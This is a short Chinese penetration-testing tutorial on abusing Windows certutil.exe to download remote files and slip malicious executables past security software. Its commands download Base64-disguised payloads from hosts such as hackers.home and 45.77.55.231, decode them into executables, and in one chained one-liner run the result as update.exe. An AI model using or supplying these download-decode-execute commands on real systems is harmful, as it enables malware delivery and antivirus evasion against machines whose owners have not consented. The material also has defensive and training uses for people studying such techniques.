内网渗透:九、certutil-远程下载绕过
目录
一、CertUti
Certutil.exe 是作为证书服务的一部分安装的命令行程序。您可以使用 Certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。
当 certutil 在没有附加参数的证书颁发机构上运行时,它会显示当前的证书颁发机构配置。在非认证机构上运行 cerutil 时,该命令默认运行 certutil -dump动词。
使用语法 :windows
certutil.exe -urlcache -split -f [URL]output.file
certutil -urlcache -split -f http://192.168.17.136:8000/1.txt
二、certutil绕过*混淆方式
- 使用CertUtil + Base64来绕过安全软件
经过Base64对恶意文件进行编码,使恶意代码样本看起来像是无害的文本文件,而后使用CertUtil.exe下载后对其进行解码。下载了文本文件使用“Certutil.exe -decode”命令将Base64编码文件解码为可执行文件。服务器
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe
- 使用特殊符号(windwos会忽略的)